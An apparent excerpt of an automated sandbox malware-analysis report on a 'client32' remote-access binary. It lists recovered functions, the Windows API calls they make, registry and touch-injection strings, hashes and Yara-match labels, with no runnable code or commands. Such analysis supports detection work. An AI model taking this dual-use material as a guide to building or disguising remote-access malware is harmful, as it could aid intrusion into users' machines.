                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Window$Rect$Parent$EnabledIntersectItemMessagePost
                                                                                        • String ID:
                                                                                        • API String ID: 818519836-0
                                                                                        • Opcode ID: 33344d5b3ab49040102bd7daff6fd58b1d3f5c5988b71863a939ad33b6b593f0
                                                                                        • Instruction ID: 21b51dd7fe149e1a5d9ad7f830f962c89668f9ef243aefe38cead8d8046866f3
                                                                                        • Opcode Fuzzy Hash: 33344d5b3ab49040102bd7daff6fd58b1d3f5c5988b71863a939ad33b6b593f0
                                                                                        • Instruction Fuzzy Hash: D8419375A00219EFDB15CFA4CD84FEEB778FB88714F10456AF926A7684EB74A9008B50
                                                                                        APIs
                                                                                        • GetDC.USER32(00000000), ref: 11153763
                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 11153779
                                                                                        • SelectPalette.GDI32(00000000,?,00000000), ref: 1115385F
                                                                                        • CreateDIBSection.GDI32(00000000,00000028,00000000,?,00000000,00000000), ref: 11153887
                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 1115389B
                                                                                        • SelectObject.GDI32(00000000,?), ref: 111538C1
                                                                                        • SelectPalette.GDI32(00000000,?,00000000), ref: 111538D1
                                                                                        • DeleteDC.GDI32(00000000), ref: 111538D8
                                                                                        • ReleaseDC.USER32(00000000,?), ref: 111538E7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Select$CreateObjectPalette$CompatibleDeleteReleaseSection
                                                                                        • String ID:
                                                                                        • API String ID: 602542589-0
                                                                                        • Opcode ID: 0628f4ae7de687692ce3acf881be40c904e5404e254904012615511724b7f5fd
                                                                                        • Instruction ID: d520eb4ea94c146294e5bc27ee2bf9e491812ef3a8de5d3ff178baa6803be84b
                                                                                        • Opcode Fuzzy Hash: 0628f4ae7de687692ce3acf881be40c904e5404e254904012615511724b7f5fd
                                                                                        • Instruction Fuzzy Hash: 1751FAF5E102289FDB64DF29CD84799BBB8EF89304F4051E9E619E3240E6705E81CF68
                                                                                        APIs
                                                                                          • Part of subcall function 111103D0: GetCurrentThreadId.KERNEL32(75097BD3,00000000,111F1590,?,110CD955,00000000,75097BD3), ref: 111103DE
                                                                                          • Part of subcall function 111103D0: EnterCriticalSection.KERNEL32(00000000,75097BD3,00000000,111F1590,?,110CD955,00000000,75097BD3), ref: 111103E8
                                                                                          • Part of subcall function 111103D0: LeaveCriticalSection.KERNEL32(00000000,75097809,00000000,?,110CD955,00000000,75097BD3), ref: 11110408
                                                                                        • EnterCriticalSection.KERNEL32(00000000,00000000,75097BD3,00000000,75097809,1105E7CB,?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD95B
                                                                                        • SendMessageA.USER32(00000000,00000476,00000000,00000000,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD988
                                                                                        • SendMessageA.USER32(00000000,00000475,00000000,?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD99A
                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD9A4
                                                                                        • IsDialogMessageA.USER32(00000000,?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD9BB
                                                                                        • LeaveCriticalSection.KERNEL32(00000000,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD9D1
                                                                                        • DestroyWindow.USER32 ref: 110CD9E1
                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD9EB
                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CDA01
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$Leave$Message$EnterSend$CurrentDestroyDialogThreadWindow
                                                                                        • String ID:
                                                                                        • API String ID: 1497311044-0
                                                                                        • Opcode ID: 2ca538d9d32515c3e592d89dbfe819c932d1486fc83d3c14ad79142d2062fd26
                                                                                        • Instruction ID: b02c8bb8fc4c5bab3a2fa1ad08f5b589118d407137368f819e71080725a4af13
                                                                                        • Opcode Fuzzy Hash: 2ca538d9d32515c3e592d89dbfe819c932d1486fc83d3c14ad79142d2062fd26
                                                                                        • Instruction Fuzzy Hash: 5521D636B41218ABE710DFA8E988BDEB7E9EB49755F0040E6F918D7640D771AD008BE0
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Text$ColorFillRect$CharacterExtraJustificationModeObjectStock
                                                                                        • String ID:
                                                                                        • API String ID: 1094208222-0
                                                                                        • Opcode ID: 1cbc9ed1b46d6c71f90ef3a18c70e791402d54b145c2918b3fccb73878480588
                                                                                        • Instruction ID: 11fb3597ac11fe0070853bb1276331f7103533f07ae90b5f1526d6834acfdad0
                                                                                        • Opcode Fuzzy Hash: 1cbc9ed1b46d6c71f90ef3a18c70e791402d54b145c2918b3fccb73878480588
                                                                                        • Instruction Fuzzy Hash: CE2148B1D01128AFDB04DFA4D988AFEB7B8EF48315F104169FD15AB208D7746A01CBA0
                                                                                        APIs
                                                                                        • GetProcAddress.KERNEL32(00000000,11196940,00000000,1100D612,?,1100CB7A,?), ref: 1100D4D4
                                                                                        • GetProcAddress.KERNEL32(00000000,11196930,?,1100CB7A,?), ref: 1100D4E8
                                                                                        • GetProcAddress.KERNEL32(00000000,11196920,?,1100CB7A,?), ref: 1100D4FD
                                                                                        • GetProcAddress.KERNEL32(00000000,11196910,?,1100CB7A,?), ref: 1100D511
                                                                                        • GetProcAddress.KERNEL32(00000000,11196904,?,1100CB7A,?), ref: 1100D525
                                                                                        • GetProcAddress.KERNEL32(00000000,111968E4,?,1100CB7A,?), ref: 1100D53A
                                                                                        • GetProcAddress.KERNEL32(00000000,111968C4,?,1100CB7A,?), ref: 1100D54E
                                                                                        • GetProcAddress.KERNEL32(00000000,111968B4,?,1100CB7A,?), ref: 1100D562
                                                                                        • GetProcAddress.KERNEL32(00000000,111968A4,?,1100CB7A,?), ref: 1100D577
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressProc
                                                                                        • String ID:
                                                                                        • API String ID: 190572456-0
                                                                                        • Opcode ID: 48f9917a60cec6284becfcab2cdcd3c09a63cc3d8906f3dcaa48a20254382f18
                                                                                        • Instruction ID: 68c230a61e409724fd33842e5b4cb172798431ad54f26f9eb7569f07803db95b
                                                                                        • Opcode Fuzzy Hash: 48f9917a60cec6284becfcab2cdcd3c09a63cc3d8906f3dcaa48a20254382f18
                                                                                        • Instruction Fuzzy Hash: E3318CB19127349FEB16CBD8C8C9A79BBE9A758749F80453AD43083248E7B65844CF60
                                                                                        APIs
                                                                                        • UnmapViewOfFile.KERNEL32(00000000,00000000,?,00000000,1109E186,?,?,1109ECDF,00000064,00000006,?,11067720,0000048C,00000001,00000000,NSMWClass), ref: 1109D98F
                                                                                        • CloseHandle.KERNEL32(?), ref: 1109D9A9
                                                                                        • CloseHandle.KERNEL32(?), ref: 1109D9B6
                                                                                        • CloseHandle.KERNEL32(?), ref: 1109D9C3
                                                                                        • SetEvent.KERNEL32(00000000,00000000,?,00000000,1109E186,?,?,1109ECDF,00000064,00000006,?,11067720,0000048C,00000001,00000000,NSMWClass), ref: 1109D9D5
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 1109D9DF
                                                                                        • SetEvent.KERNEL32(?,00000000,?,00000000,1109E186,?,?,1109ECDF,00000064,00000006,?,11067720,0000048C,00000001,00000000,NSMWClass), ref: 1109D9F1
                                                                                        • CloseHandle.KERNEL32(?), ref: 1109D9FB
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 1109DA08
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseHandle$Event$FileUnmapView
                                                                                        • String ID:
                                                                                        • API String ID: 2427653990-0
                                                                                        • Opcode ID: 1acc1433f5a53ddd11cd649e4de06c5f5174080ef02ec046c8e85dcc12a9f492
                                                                                        • Instruction ID: ef7400aadcbdc77f3d4b8b656ca31cdf014edcd8fc82e503e85a70b1789423f5
                                                                                        • Opcode Fuzzy Hash: 1acc1433f5a53ddd11cd649e4de06c5f5174080ef02ec046c8e85dcc12a9f492
                                                                                        • Instruction Fuzzy Hash: 7B11ECB1A407489BD730EFAAC9D481AFBF9AF583043514D7EE19AC3A10C634E8489B50
                                                                                        APIs
                                                                                          • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                        • _memset.LIBCMT ref: 110433A9
                                                                                        • GetSystemMetrics.USER32(0000004C), ref: 110433B9
                                                                                        • GetSystemMetrics.USER32(0000004D), ref: 110433C1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: MetricsSystem$__wcstoi64_memset
                                                                                        • String ID: Client$DisableTouch$Inject Touch Down @ %d,%d, w=%d,h=%d, id=%d$Inject Touch Up @ %d,%d, id=%d
                                                                                        • API String ID: 3760389471-710950153
                                                                                        • Opcode ID: f06636ca7976e5648e740387b7cf9cec37ff4d176a2c677b8048423796352473
                                                                                        • Instruction ID: 3df93499149cd7a4cb1b4a3ff8c52798864cd21da05d47721e0dc8214685208f
                                                                                        • Opcode Fuzzy Hash: f06636ca7976e5648e740387b7cf9cec37ff4d176a2c677b8048423796352473
                                                                                        • Instruction Fuzzy Hash: 2491D270D0465A9FCB04DFA9C880AEEFBF5FF48304F108169E555AB294DB34A905CB90
                                                                                        APIs
                                                                                        • InflateRect.USER32 ref: 1101F564
                                                                                        • InflateRect.USER32 ref: 1101F5B8
                                                                                        • GetBkColor.GDI32(?), ref: 1101F5BE
                                                                                        • GetTextColor.GDI32(?), ref: 1101F645
                                                                                          • Part of subcall function 1101EF10: GetSysColor.USER32(00000011), ref: 1101EF58
                                                                                          • Part of subcall function 1101EF10: SetTextColor.GDI32(?,00000000), ref: 1101EF63
                                                                                          • Part of subcall function 1101EF10: SetBkColor.GDI32(?,?), ref: 1101EF81
                                                                                          • Part of subcall function 1101EF10: SelectObject.GDI32(?,?), ref: 1101F00D
                                                                                          • Part of subcall function 1101EF10: GetSystemMetrics.USER32(00000047), ref: 1101F018
                                                                                          • Part of subcall function 1101EF10: DrawTextA.USER32(?,?,?,?,00000024), ref: 1101F056
                                                                                          • Part of subcall function 1101EF10: SelectObject.GDI32(?,?), ref: 1101F064
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Color$Text$InflateObjectRectSelect$DrawMetricsSystem
                                                                                        • String ID: VUUU$VUUU
                                                                                        • API String ID: 179481525-3149182767
                                                                                        • Opcode ID: b696bc920655d17bf41ed58ebd1d76277304b1d90df833fe6010ba542b89aa38
                                                                                        • Instruction ID: daec56a1ae35cbc085cb1de7b5199678d62f5094ff6f4e18006982d33a32e855
                                                                                        • Opcode Fuzzy Hash: b696bc920655d17bf41ed58ebd1d76277304b1d90df833fe6010ba542b89aa38
                                                                                        • Instruction Fuzzy Hash: 7F617F75E0020A9BCB04CFA8D881AAEF7F5FB58324F14466AE415A7385DB74FA05CB94
                                                                                        APIs
                                                                                          • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                          • Part of subcall function 110B0730: _memset.LIBCMT ref: 110B073C
                                                                                          • Part of subcall function 110B0730: _memset.LIBCMT ref: 110B076D
                                                                                          • Part of subcall function 110B0FA0: timeGetTime.WINMM ref: 110B0FA6
                                                                                          • Part of subcall function 110B0FA0: timeGetTime.WINMM ref: 110B1075
                                                                                        • WaitForSingleObject.KERNEL32(?,000000FA,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B790D
                                                                                        • GetDC.USER32(00000000), ref: 110B7951
                                                                                        • GetDeviceCaps.GDI32(00000000,0000000E), ref: 110B795C
                                                                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 110B7967
                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 110B7973
                                                                                          • Part of subcall function 110B3560: SetEvent.KERNEL32(?,111F10F8,111E6C98,?,110B7A1E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B3578
                                                                                          • Part of subcall function 110B3560: CloseHandle.KERNEL32(?), ref: 110B3585
                                                                                          • Part of subcall function 110B3560: CloseHandle.KERNEL32(?), ref: 110B3598
                                                                                          • Part of subcall function 110B3560: CloseHandle.KERNEL32(?), ref: 110B35A5
                                                                                          • Part of subcall function 110B3560: WaitForSingleObject.KERNEL32(?,000003E8,111F10F8,111E6C98,?,110B7A1E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B35C3
                                                                                          • Part of subcall function 110B3560: CloseHandle.KERNEL32(?), ref: 110B35D0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseHandle$CapsDeviceObjectSingleTimeWait_memsettime$EventRelease__wcstoi64
                                                                                        • String ID: TraceScrape$_debug
                                                                                        • API String ID: 2936113293-4091781993
                                                                                        • Opcode ID: bc3a8f874b993350267bac68b2ae837515d2cb9a288f5247aebbdc5b24175b95
                                                                                        • Instruction ID: beb9be5f3decd216f1517493ed5af73f7f61b8e2793af04975b89e9167c73652
                                                                                        • Opcode Fuzzy Hash: bc3a8f874b993350267bac68b2ae837515d2cb9a288f5247aebbdc5b24175b95
                                                                                        • Instruction Fuzzy Hash: 5F41C779E042465BEB05CFA4C9C1FAF7BB5EB88704F1405A8E805AB285EA70ED04C7E4
                                                                                        APIs
                                                                                          • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                          • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                          • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                        • InitializeCriticalSection.KERNEL32(0000000C), ref: 11061790
                                                                                        • RegCreateKeyExA.ADVAPI32(00000000,00000000,00000000,11195264,00000000,0002001F,00000000,00000008,?), ref: 110617F5
                                                                                        • RegCreateKeyExA.ADVAPI32(00000000,?,00000000,11195264,00000000,00020019,00000000,00000008,?), ref: 1106181C
                                                                                        • RegCreateKeyExA.ADVAPI32(00000000,ConfigList,00000000,11195264,00000000,0002001F,00000000,?,?), ref: 1106185B
                                                                                        • RegCreateKeyExA.ADVAPI32(?,ConfigList,00000000,11195264,00000000,00020019,00000000,?,?), ref: 1106188F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
